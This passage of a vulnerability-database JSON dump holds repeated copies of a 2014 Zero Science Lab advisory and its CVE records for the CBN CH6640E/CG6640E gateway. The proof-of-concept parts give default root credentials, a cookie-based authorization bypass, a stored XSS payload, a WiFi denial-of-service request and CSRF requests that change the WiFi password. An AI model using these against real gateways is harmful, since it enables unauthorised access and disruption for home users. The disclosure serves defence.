\n[24] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657>\n\n##### Changelog\n\n[25.10.2014] - Initial release \n[28.10.2014] - Added reference [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11] and [12] \n[30.10.2014] - Added reference [13] and [14] \n[07.11.2014] - Added reference [15], [16], [17], [18], [19], [20], [21], [22], [23] and [24] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 2, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "66f1fe8dfb98c44ed25f060fb2d984fbbf28b5dbf88ae78f0623e1864d68bcdc", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f66c24acac7472d5f5aeed34d2ef847c", "key": "cvelist"}, {"hash": "0a06c31af4646e1320032051995e03bf", "key": "sourceData"}, {"hash": "b6ee79178c2cc9c4204defe1a56a2d93", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8ae079da90a361d7a0abdc807f4cd5a2", "key": "reporter"}, {"hash": "77d58a390a2418f3ec0a57d0cbc9011a", "key": "href"}, {"hash": "a569b1601b5fa32eadd5d42648f361fe", "key": "description"}, {"hash": "edc9dc06a2dd9f6e2238c411ac8a6db8", "key": "type"}, {"hash": "11cf593deb5e829cf6e1206da52c8d1c", "key": "title"}, {"hash": "b6ee79178c2cc9c4204defe1a56a2d93", "key": "published"}, {"hash": "75437181f4baf6bf0cf8acd374ea0527", "key": "sourceHref"}], "history": [], "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php", "id": "ZSL-2014-5203", "lastseen": "2018-08-30T20:35:42", "modified": "2014-10-25T00:00:00", "objectVersion": "1.3", "published": "2014-10-25T00:00:00", "references": [], "reporter": "Gjoko Krstic", "sourceData": "\u00ef\u00bb\u00bf\nCBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities\n\n\nVendor: Compal Broadband Networks (CBN), Inc.\nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway.\n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information.\n\nDesc: The CBN modem gateway suffers from multiple vulnerabilities including\nauthorization bypass information disclosure, stored XSS, CSRF and denial of\nservice.\n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info.\n\n--\n<html>\n<body>\n<script>\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n</script>\n</body>\n</html>\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"><script>alert(document.cookie);</script>\n\n--\n<html>\n<body>\n<script>\ndocument.cookie=\"hax0r\"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n</script>\n</body>\n</html>\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)\n\n", "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/cbn_mv.txt", "title": "CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities", "type": "zeroscience", "viewCount": 40}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2018-08-30T20:35:42"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2014-8653", "CVE-2014-8656", "CVE-2014-8654", "CVE-2014-8655", "CVE-2014-8657"], "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "description": "Title: CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities \nAdvisory ID: [ZSL-2014-5203](<ZSL-2014-5203.php>) \nType: Local/Remote \nImpact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting, DoS \nRisk: (3/5) \nRelease Date: 25.10.2014 \n\n\n##### Summary\n\nThe CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway. \n\n##### Description\n\nThe CBN modem gateway suffers from multiple vulnerabilities including authorization bypass information disclosure, stored XSS, CSRF and denial of service. \n\n##### Vendor\n\nCompal Broadband Networks (CBN), Inc. - <http://www.icbn.com.tw>\n\n##### Affected Version\n\nModel: CH6640 and CH6640E \nHardware version: 1.0 \nFirmware version: CH6640-3.5.11.7-NOSH \nBoot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01 \nDOCSIS mode: DOCSIS 3.0 \n\n##### Tested On\n\nCompal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7 \n\n##### Vendor Status\n\nN/A \n\n##### PoC\n\n[cbn_mv.txt](<../../codes/cbn_mv.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <http://cxsecurity.com/issue/WLB-2014100162> \n[2] <http://www.exploit-db.com/exploits/35075/> \n[3] <http://osvdb.org/show/osvdb/113836> \n[4] <http://osvdb.org/show/osvdb/113837> \n[5] <http://osvdb.org/show/osvdb/113838> \n[6] <http://osvdb.org/show/osvdb/113839> \n[7] <http://osvdb.org/show/osvdb/113840> \n[8] <http://osvdb.org/show/osvdb/113841> \n[9] <http://osvdb.org/show/osvdb/113842> \n[10] <http://osvdb.org/show/osvdb/113843> \n[11] <http://packetstormsecurity.com/files/128860> \n[12] <http://www.securityfocus.com/bid/70762> \n[13] <http://xforce.iss.net/xforce/xfdb/98328> \n[14] <http://xforce.iss.net/xforce/xfdb/98329> \n[15] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653> \n[16] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654> \n[17] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655> \n[18] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656> \n[19] <http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657> \n[20] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653> \n[21] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654> \n[22] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655> \n[23] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656> \n[24] <http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657>\n\n##### Changelog\n\n[25.10.2014] - Initial release \n[28.10.2014] - Added reference [1], [2], [3], [4], [5], [6], [7], [8], [9], [10], [11] and [12] \n[30.10.2014] - Added reference [13] and [14] \n[07.11.2014] - Added reference [15], [16], [17], [18], [19], [20], [21], [22], [23] and [24] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <http://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "edition": 11, "enchantments": {"dependencies": {"modified": "2019-10-28T20:32:08", "references": [{"idList": ["CVE-2014-8653", "CVE-2014-8656", "CVE-2014-8654", "CVE-2014-8655", "CVE-2014-8657"], "type": "cve"}, {"idList": ["EDB-ID:35075"], "type": "exploitdb"}]}, "score": {"modified": "2019-10-28T20:32:08", "value": 5.9, "vector": "NONE"}}, "hash": "a4d49d04788e067612aeb35d3efe21376350f41ec5980ffb14ecf034071a5b29", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f66c24acac7472d5f5aeed34d2ef847c", "key": "cvelist"}, {"hash": "0a06c31af4646e1320032051995e03bf", "key": "sourceData"}, {"hash": "b6ee79178c2cc9c4204defe1a56a2d93", "key": "modified"}, {"hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d", "key": "cvss"}, {"hash": "8ae079da90a361d7a0abdc807f4cd5a2", "key": "reporter"}, {"hash": "77d58a390a2418f3ec0a57d0cbc9011a", "key": "href"}, {"hash": "a569b1601b5fa32eadd5d42648f361fe", "key": "description"}, {"hash": "edc9dc06a2dd9f6e2238c411ac8a6db8", "key": "type"}, {"hash": "11cf593deb5e829cf6e1206da52c8d1c", "key": "title"}, {"hash": "b6ee79178c2cc9c4204defe1a56a2d93", "key": "published"}, {"hash": "75437181f4baf6bf0cf8acd374ea0527", "key": "sourceHref"}], "history": [], "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php", "id": "ZSL-2014-5203", "lastseen": "2019-10-28T20:32:08", "modified": "2014-10-25T00:00:00", "objectVersion": "1.3", "published": "2014-10-25T00:00:00", "references": [], "reporter": "Gjoko Krstic", "sourceData": "\u00ef\u00bb\u00bf\nCBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities\n\n\nVendor: Compal Broadband Networks (CBN), Inc.\nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway.\n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information.\n\nDesc: The CBN modem gateway suffers from multiple vulnerabilities including\nauthorization bypass information disclosure, stored XSS, CSRF and denial of\nservice.\n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info.\n\n--\n<html>\n<body>\n<script>\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n</script>\n</body>\n</html>\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"><script>alert(document.cookie);</script>\n\n--\n<html>\n<body>\n<script>\ndocument.cookie=\"hax0r\"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n</script>\n</body>\n</html>\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)\n\n", "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/cbn_mv.txt", "title": "CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities", "type": "zeroscience", "viewCount": 143}, "differentElements": ["sourceData"], "edition": 11, "lastseen": "2019-10-28T20:32:08"}], "edition": 12, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "f66c24acac7472d5f5aeed34d2ef847c"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "a569b1601b5fa32eadd5d42648f361fe"}, {"key": "href", "hash": "77d58a390a2418f3ec0a57d0cbc9011a"}, {"key": "modified", "hash": "b6ee79178c2cc9c4204defe1a56a2d93"}, {"key": "published", "hash": "b6ee79178c2cc9c4204defe1a56a2d93"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "8ae079da90a361d7a0abdc807f4cd5a2"}, {"key": "sourceData", "hash": "c4e10a83b9354d59ad407d546583fbf4"}, {"key": "sourceHref", "hash": "75437181f4baf6bf0cf8acd374ea0527"}, {"key": "title", "hash": "11cf593deb5e829cf6e1206da52c8d1c"}, {"key": "type", "hash": "edc9dc06a2dd9f6e2238c411ac8a6db8"}], "hash": "da5773d28d51cbfce0bb986c7f0fcab128bd405dc996401e0e0ce573a991d1b4", "viewCount": 144, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:35075"]}, {"type": "cve", "idList": ["CVE-2014-8656", "CVE-2014-8657", "CVE-2014-8654", "CVE-2014-8653", "CVE-2014-8655"]}], "modified": "2019-11-11T16:11:36"}, "score": {"value": 6.8, "vector": "NONE", "modified": "2019-11-11T16:11:36"}, "vulnersScore": 6.8}, "objectVersion": "1.3", "sourceHref": "http://zeroscience.mk/en/vulnerabilities/../../codes/cbn_mv.txt", "sourceData": "<html><head><title>403 Nothing to see.</title>\n<link rel=\"Shortcut Icon\" href=\"favicon.ico\" type=\"image/x-icon\">\n<style type=\"text/css\">\n<!--\nbody {\n\tbackground-color: #000;\n}\nbody,td,th {\n\tfont-family: Verdana, Geneva, sans-serif;\n}\na:link {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:visited {\n\tcolor: #008FEF;\n\ttext-decoration: none;\n}\na:hover {\n\ttext-decoration: underline;\n\tcolor: #666;\n}\na:active {\n\ttext-decoration: none;\n}\n-->\n</style>\n</head>\n<body bgcolor=black>\n<center>\n<font color=\"#7E88A3\" size=\"2\">\n<br /><br />\n<h1>403 Nothing to see.</h1>\n\nYou do not have the powah for this request /403.shtml<br /><br />\n<font size=\"2\"><a href=\"https://www.zeroscience.mk\">https://www.zeroscience.mk</a></font>\n</font></center>\n</body></html>", "scheme": null}
{"exploitdb": [{"lastseen": "2016-02-04T00:33:17", "bulletinFamily": "exploit", "description": "CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities. CVE-2014-8655,CVE-2014-8657. Webapps exploit for hardware platform", "modified": "2014-10-27T00:00:00", "published": "2014-10-27T00:00:00", "id": "EDB-ID:35075", "href": "https://www.exploit-db.com/exploits/35075/", "type": "exploitdb", "title": "CBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities", "sourceData": "\r\nCBN CH6640E/CG6640E Wireless Gateway Series Multiple Vulnerabilities\r\n\r\n\r\nVendor: Compal Broadband Networks (CBN), Inc.\r\nProduct web page: http://www.icbn.com.tw\r\nAffected version: Model: CH6640 and CH6640E\r\n Hardware version: 1.0\r\n Firmware version: CH6640-3.5.11.7-NOSH\r\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\r\n DOCSIS mode: DOCSIS 3.0\r\n\r\n\r\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\r\nhome office, or small business/enterprise. It can be used in households with\r\none or more computers capable of wireless connectivity for remote access to\r\nthe wireless gateway.\r\n\r\nDefault credentials:\r\n\r\nadmin/admin - Allow access gateway pages\r\nroot/compalbn - Allow access gateway, provisioning pages and provide more\r\n configuration information.\r\n\r\nDesc: The CBN modem gateway suffers from multiple vulnerabilities including\r\nauthorization bypass information disclosure, stored XSS, CSRF and denial of\r\nservice.\r\n\r\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\r\n\r\n\r\nVulnerabilities discovered by Gjoko 'LiquidWorm' Krstic\r\n @zeroscience\r\n\r\n\r\nAdvisory ID: ZSL-2014-5203\r\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\r\n\r\n\r\n04.10.2014\r\n\r\n---\r\n\r\n\r\n\r\nAuthorization Bypass Information Disclosure Vulnerability\r\n#########################################################\r\n\r\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\r\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\r\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\r\nhttp://192.168.0.1/basicDDNS.html\r\nhttp://192.168.0.1/basicLanUsers.html\r\nhttp://192.168.0.1:5000/rootDesc.xml\r\n\r\nSet cookie: userData to root or admin, reveals additional pages/info.\r\n\r\n--\r\n<html>\r\n<body>\r\n<script>\r\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\r\n</script>\r\n</body>\r\n</html>\r\n--\r\n\r\n\r\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\r\n###################################################################\r\n\r\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\r\n\r\n\r\nStored Cross-Site Scripting (XSS) Vulnerability\r\n###############################################\r\n\r\nCookie: userData\r\nValue: hax0r\"><script>alert(document.cookie);</script>\r\n\r\n--\r\n<html>\r\n<body>\r\n<script>\r\ndocument.cookie=\"hax0r\"><script>alert(document.cookie);</script>; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\r\n</script>\r\n</body>\r\n</html>\r\n--\r\n\r\n\r\nCross-Site Request Forgery (CSRF) Vulnerability\r\n###############################################\r\n\r\nDDNS config:\r\n------------\r\n\r\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1\r\n\r\n\r\nChange wifi pass:\r\n-----------------\r\n\r\nGET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1\r\n\r\n\r\nAdd static mac address (static assigned dhcp client):\r\n-----------------------------------------------------\r\n\r\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1\r\n\r\n\r\nEnable/Disable UPnP:\r\n--------------------\r\n\r\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)\r\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/35075/"}], "cve": [{"lastseen": "2019-05-29T18:13:49", "bulletinFamily": "NVD", "description": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH have a default password of (1) admin for the admin account and (2) compalbn for the root account, which makes it easier for remote attackers to obtain access to certain sensitive information via unspecified vectors.", "modified": "2014-11-06T19:20:00", "id": "CVE-2014-8656", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8656", "published": "2014-11-06T15:55:00", "title": "CVE-2014-8656", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:13:49", "bulletinFamily": "NVD", "description": "Multiple cross-site request forgery (CSRF) vulnerabilities in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway hardware 1.0 with firmware CH6640-3.5.11.7-NOSH allow remote attackers to hijack the authentication of administrators for requests that (1) have unspecified impact on DDNS configuration via a request to basicDDNS.html, (2) change the wifi password via the psKey parameter to setWirelessSecurity.html, (3) add a static MAC address via the MacAddress parameter in an add_static action to setBasicDHCP1.html, or (4) enable or disable UPnP via the UPnP parameter in an apply action to setAdvancedOptions.html.", "modified": "2017-09-08T01:29:00", "id": "CVE-2014-8654", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8654", "published": "2014-11-06T15:55:00", "title": "CVE-2014-8654", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:13:49", "bulletinFamily": "NVD", "description": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to cause a denial of service (disconnect all wifi clients) via a request to wirelessChannelStatus.html.", "modified": "2017-09-08T01:29:00", "id": "CVE-2014-8657", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8657", "published": "2014-11-06T15:55:00", "title": "CVE-2014-8657", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:13:49", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to inject arbitrary web script or HTML via the userData cookie.", "modified": "2017-09-08T01:29:00", "id": "CVE-2014-8653", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8653", "published": "2014-11-06T15:55:00", "title": "CVE-2014-8653", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:13:49", "bulletinFamily": "NVD", "description": "The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to bypass authentication and obtain sensitive information via an (a) admin or a (b) root value in the userData cookie in a request to (1) CmgwWirelessSecurity.xml, (2) DocsisConfigFile.xml, or (3) CmgwBasicSetup.xml in xml/ or (4) basicDDNS.html, (5) basicLanUsers.html, or (6) rootDesc.xml.", "modified": "2017-09-08T01:29:00", "id": "CVE-2014-8655", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8655", "published": "2014-11-06T15:55:00", "title": "CVE-2014-8655", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
